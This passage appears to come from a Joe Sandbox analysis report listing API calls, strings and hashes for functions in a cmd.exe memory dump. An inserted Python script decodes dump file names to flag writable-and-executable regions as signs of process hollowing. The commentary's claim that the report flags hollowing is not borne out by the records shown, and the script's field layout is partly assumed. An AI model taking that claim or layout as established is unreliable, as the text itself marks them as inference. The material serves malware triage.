• Instruction Fuzzy Hash: 6231CE34700304AAEB207BA58C09FBE7769EFCAB25F084294F911D62C4DB74D806C779
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00D68FCD
• _wcsicmp.MSVCRT ref: 00D68FE3
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D69002
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D69013
  • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: _wcsicmp$AttributesErrorFileLastwcschr
• String ID:
• API String ID: 2943530692-0
• Opcode ID: 1c95d9caeab30f8166c96f62744b0273a346607c72f197dbcd1236154909a3a1
• Instruction ID: 73dc36d9e828755f6aa5bf3e1177cde02de0a384c8909d9beadf6cf3927ead3c
• Instruction Fuzzy Hash: 9DC1F731A003119BCB24AF78889577AB7B9EF48724F28812AE54AD7290FB74DD41DB71
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00D68060
  • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
• ??_V@YAXPAX@Z.MSVCRT ref: 00D681BE
  • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
  • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D6818C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D68197
• longjmp.MSVCRT(00DA0A30,00000001,-00000001,00000000,?,00000000), ref: 00D7B09E
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D87FC9,?,00D899AE,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D7B0C1
• fprintf.MSVCRT ref: 00D7B0D5
• fflush.MSVCRT ref: 00D7B0E3
  • Part of subcall function 00D68F21: _wcsicmp.MSVCRT ref: 00D68FCD
  • Part of subcall function 00D68F21: _wcsicmp.MSVCRT ref: 00D68FE3
  • Part of subcall function 00D68F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D69002
  • Part of subcall function 00D68F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D69013
  • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
  • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
  • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
  • Part of subcall function 00D71CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
  • Part of subcall function 00D71CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
  • Part of subcall function 00D701F5: wcsrchr.MSVCRT ref: 00D701FB
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
• String ID:
• API String ID: 3753564779-0
• Opcode ID: 7b0bc69857912757e2bf592ee9ec49a768ae6f950d2933c3737454ac1efeb4ce
• Instruction ID: 3241fa2239772fc169c99bfa786a811e6daa2bbe511d91c21f8e98cff92e5d10
• Instruction Fuzzy Hash: BF51CF30A003159BCB24ABB89C56B7BB7B4EF09710F18451AF94AD7291EB74C981DB71
Uniqueness
Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88B7B
                                                                                        • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D89323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00D88B83
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88BB5
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88BBD
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88BCF
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88BD7
                                                                                        • memcmp.MSVCRT ref: 00D88BED
                                                                                          • Part of subcall function 00D7654B: _wcsicmp.MSVCRT ref: 00D765A4
                                                                                          • Part of subcall function 00D7654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00D765D7
                                                                                          • Part of subcall function 00D7654B: _open_osfhandle.MSVCRT ref: 00D765EB
                                                                                          • Part of subcall function 00D7654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00D82092
                                                                                        • _get_osfhandle.MSVCRT ref: 00D88C1A
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D88C22
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                        • String ID:
                                                                                        • API String ID: 4208585293-0
                                                                                        • Opcode ID: 1a44604d28541e9af9cd37593bcd15b8f9504a07e9e2b2c023803938fea239cf
                                                                                        • Instruction ID: 37fd79f72407fe4a11d236b098f628f520c13ab88bdd165d1bee1c3346bd254c
                                                                                        • Opcode Fuzzy Hash: 1a44604d28541e9af9cd37593bcd15b8f9504a07e9e2b2c023803938fea239cf
                                                                                        • Instruction Fuzzy Hash: 3F219171200204AFEB186F78DC4AE7AB75DEF89360F244A28F556D22E5EBB19C05D731
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
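The "Memory Dump Source" entries on this page record where each function was carved from: a dot-separated .sdmp file name, the region's Offset, and whether the region parsed as a PE. The decoder below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code. It assumes the name layout <process index>.<stage>.<counter>.<base>.<protection>.<three further fields>.sdmp and decodes only what can be cross-checked on the page: the process index, stage and base address (which also appear in the hcaresult_15_2_d60000_cmd.jbxd snapshot name, an assumed pattern) and the Win32 page-protection value, whose meaning is fixed by winnt.h (0x40 = PAGE_EXECUTE_READWRITE). The counter and the last three fields are left undecoded, and the non-executable sample line is constructed for the negative case. The point of the check: a normally loaded image's code is PAGE_EXECUTE_READ, so a "based on PE: true" region that is RWX inside cmd.exe is the footprint of the process hollowing the report flags.

```python
"""Decode Joe Sandbox "Memory Dump Source" lines and flag RWX PE-backed regions.

Added example; the .sdmp field layout beyond base address and protection is an
assumption, as is the hcaresult_<proc>_<stage>_<base>_<image>.jbxd pattern.
"""
import re
from dataclasses import dataclass

# Win32 page-protection values from winnt.h (low byte; PAGE_GUARD etc. are higher bits).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# ASSUMED layout: proc.stage.counter.base.protect.f6.f7.f8.sdmp (all hex except the counter).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<counter>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# ASSUMED pattern for the IDA-plugin snapshot name.
SNAPSHOT_RE = re.compile(
    r"hcaresult_(?P<proc>\d+)_(?P<stage>\d+)_(?P<base>[0-9a-fA-F]+)_(?P<image>[^.]+)\.jbxd"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    stage: int
    base: int
    protect: int
    based_on_pe: bool

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"unknown({self.protect:#x})")


def parse_sdmp_name(name: str) -> tuple[int, int, int, int]:
    """Return (process_index, stage, base, protect) from a .sdmp file name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name}")
    return int(m["proc"], 16), int(m["stage"], 16), int(m["base"], 16), int(m["protect"], 16)


def decode_source_line(line: str) -> DumpRegion:
    """Parse one 'Source File: ... , Offset: ..., based on PE: ...' line.

    The Offset printed by the report must equal the base encoded in the name;
    a mismatch means the line was mangled and should not be trusted.
    """
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("no 'Source File:' entry on line")
    proc, stage, base, protect = parse_sdmp_name(m["name"])
    offset = int(m["offset"], 16)
    if offset != base:
        raise ValueError(f"Offset {offset:#x} does not match dump base {base:#x}")
    return DumpRegion(proc, stage, base, protect, m["pe"] == "true")


def is_rwx_pe_region(region: DumpRegion) -> bool:
    """True for a PE-backed region that is both writable and executable (hollowing footprint)."""
    p = region.protect & 0xFF
    return region.based_on_pe and p in EXECUTABLE and p in WRITABLE


def snapshot_matches(region: DumpRegion, snapshot_line: str) -> bool:
    """Cross-check the region against the 'Snapshot File: hcaresult_...' line."""
    m = SNAPSHOT_RE.search(snapshot_line)
    if not m:
        return False
    return (int(m["proc"]) == region.process_index
            and int(m["stage"]) == region.stage
            and int(m["base"], 16) == region.base)


# Copied from this report's function records.
REPORT_SOURCE_LINE = ("• Source File: 0000000F.00000002.2068460752803.0000000000D60000"
                      ".00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true")
REPORT_SNAPSHOT_LINE = "• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd"
# Constructed negative case (not from the report): a read/write heap-like region.
CONSTRUCTED_RW_LINE = ("• Source File: 0000000F.00000002.2068460752803.0000000000E10000"
                       ".00000004.80000000.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false")

if __name__ == "__main__":
    for line in (REPORT_SOURCE_LINE, CONSTRUCTED_RW_LINE):
        r = decode_source_line(line)
        print(f"proc={r.process_index} stage={r.stage} base={r.base:#010x} "
              f"{r.protect_name} pe={r.based_on_pe} rwx_pe={is_rwx_pe_region(r)} "
              f"snapshot_ok={snapshot_matches(r, REPORT_SNAPSHOT_LINE)}")
```

Run it against every "Source File:" line of a report to list the regions worth dumping first; on this page all records resolve to the same RWX, PE-backed region at 0xD60000 in process 15 (cmd.exe), which is why every function here carries the same snapshot name.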

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: %s
                                                                                        • API String ID: 2221118986-3043279178
                                                                                        • Opcode ID: 848f2ff474eb43a5bf07b1b37267313e523f015a92c08885236fb0b89456058d
                                                                                        • Instruction ID: 4b16282f90b57211774936cc212eadad1480a7b40173538b8e11efacec9d7a0b
                                                                                        • Opcode Fuzzy Hash: 848f2ff474eb43a5bf07b1b37267313e523f015a92c08885236fb0b89456058d
                                                                                        • Instruction Fuzzy Hash: 29915CB16083419BD734DB64D896BABB3E4BF94304F08892DE58D96191FB34EA04DB73
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • _wcsnicmp.MSVCRT ref: 00D6C1B7
                                                                                        • wcstol.MSVCRT ref: 00D6C1FC
                                                                                        • wcstol.MSVCRT ref: 00D6C28A
                                                                                        • longjmp.MSVCRT(?,000000FF), ref: 00D7CFB0
                                                                                        • longjmp.MSVCRT(?,000000FF), ref: 00D7CFC4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                                        • String ID:
                                                                                        • API String ID: 2863075230-0
                                                                                        • Opcode ID: acfd9d3c157191edbca5585268373081a234b2c0e4026f7f75399b73f7f675f3
                                                                                        • Instruction ID: 70cd487d40de24f9428e82f8a903cbb9682bdb4ce3c48620a4b683b610a53744
                                                                                        • Opcode Fuzzy Hash: acfd9d3c157191edbca5585268373081a234b2c0e4026f7f75399b73f7f675f3
                                                                                        • Instruction Fuzzy Hash: EAF19075D10215CBCB24DF98C8906BEB7B1FF88700F69921AD896A7340E775AD42CBB0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D72795
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • memset.MSVCRT ref: 00D7280E
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00D7281D
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00D72857
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D7290B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$EnvironmentVariable
                                                                                        • String ID: DIRCMD
                                                                                        • API String ID: 1405722092-1465291664
                                                                                        • Opcode ID: 5390f59da92859797084f1fca854f760fd15058161ef05d61f0120c0fa8f4459
                                                                                        • Instruction ID: dfa86d48f2d6b2ae6cdf27a0213fa8aa33926320b4b980ec0d83a6b1051d6a91
                                                                                        • Opcode Fuzzy Hash: 5390f59da92859797084f1fca854f760fd15058161ef05d61f0120c0fa8f4459
                                                                                        • Instruction Fuzzy Hash: 947119B190C3819BD764DF29C8846ABBBE4FF95314F14892EF599C3250EB309904CB67
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswdigit
                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                        • API String ID: 2770779731-632268628
                                                                                        • Opcode ID: cc3e35e28434319b1363ca80b5a150ac166499ebaa711e825c936c87a994417e
                                                                                        • Instruction ID: c742cac09206aaa364530e56a3b6a87593798c6ed2120cbcd753eb46f06fc383
                                                                                        • Opcode Fuzzy Hash: cc3e35e28434319b1363ca80b5a150ac166499ebaa711e825c936c87a994417e
                                                                                        • Instruction Fuzzy Hash: 1B1191362046129F97649F6EE84487677E8EF9B771324802EF5C5C7251FB21DC00E679
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D786E3
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D786EB
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00D7872A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D78743
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7874B
                                                                                          • Part of subcall function 00D69B3B: _get_osfhandle.MSVCRT ref: 00D69B4E
                                                                                          • Part of subcall function 00D69B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00DA0AF0,000000FF,00D9A7F0,00002000,00000000,00000000), ref: 00D69B8E
                                                                                          • Part of subcall function 00D69B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F0,-00000001,?,00000000), ref: 00D69BA3
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001), ref: 00D787CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 1333215474-0
                                                                                        • Opcode ID: 9564a9b0671d5fe2b9348fed6ca25bd9b84bab8c232b806945e65030f68a25dc
                                                                                        • Instruction ID: f6d9f2baee798644f1e28deb57715d7ea5cb17d62f1a9ca4e701f950f0a6a714
                                                                                        • Opcode Fuzzy Hash: 9564a9b0671d5fe2b9348fed6ca25bd9b84bab8c232b806945e65030f68a25dc
                                                                                        • Instruction Fuzzy Hash: 0451D831B80301EBDB28ABB8D889B6EB7A9EB04715F148529F546D7281FB70DC40DB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                        • iswspace.MSVCRT ref: 00D661E4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcschr$iswspace
                                                                                        • String ID:
                                                                                        • API String ID: 3458554142-0
                                                                                        • Opcode ID: 3b922fcdb3af56f9d79dd0f30c2dd8b9588f55b168ffab20e2e38775b50eea8e
                                                                                        • Instruction ID: 5daeee763246b148f4e0e5e2d2a6b2d8851c3f1a517a3c9e63e8bd3778644c2f
                                                                                        • Opcode Fuzzy Hash: 3b922fcdb3af56f9d79dd0f30c2dd8b9588f55b168ffab20e2e38775b50eea8e
                                                                                        • Instruction Fuzzy Hash: CA91A8719003549BDB24DFA9EC21AAEB7B8FF49300F14861EE80AD7390EB719840CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: ELSE$IF/?
                                                                                        • API String ID: 2081463915-1134991328
                                                                                        • Opcode ID: 976125d00520c5236d27f256aef102236207cc3a3a2b944fa51b724b8f495977
                                                                                        • Instruction ID: 181d14094aee417cfab815c36b4b3dc1252682ce46da1cf75a329866d4371065
                                                                                        • Opcode Fuzzy Hash: 976125d00520c5236d27f256aef102236207cc3a3a2b944fa51b724b8f495977
                                                                                        • Instruction Fuzzy Hash: F95126326143019FE730AB79AC56B2637A0DB85311F19942FE58ADB291FBB1C845CF32
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D7643A: NtOpenThreadToken.NTDLL ref: 00D76454
                                                                                          • Part of subcall function 00D7643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00D7646C
                                                                                          • Part of subcall function 00D7643A: NtClose.NTDLL ref: 00D764BD
                                                                                        • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00D763B5
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D763E3
                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00D81EF4
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D81EFB
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00D81F6B
                                                                                        • wcsstr.MSVCRT ref: 00D81F86
                                                                                        • wcsstr.MSVCRT ref: 00D81FA4
                                                                                          • Part of subcall function 00D7640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00D89C96,00D7FDFA,00000000,?), ref: 00D7642F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                         • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                        • String ID:
                                                                                        • API String ID: 1313749407-0
                                                                                        • Opcode ID: 3fbdafa0dbe6fc3df8e493fdcfedad6bdb1c58ef36de90ad23ad2b1e390f98a3
                                                                                        • Instruction ID: 437a54ad38d219919900d92a0f4bf192f19d2b372afd02c8ff76e43c5852c618
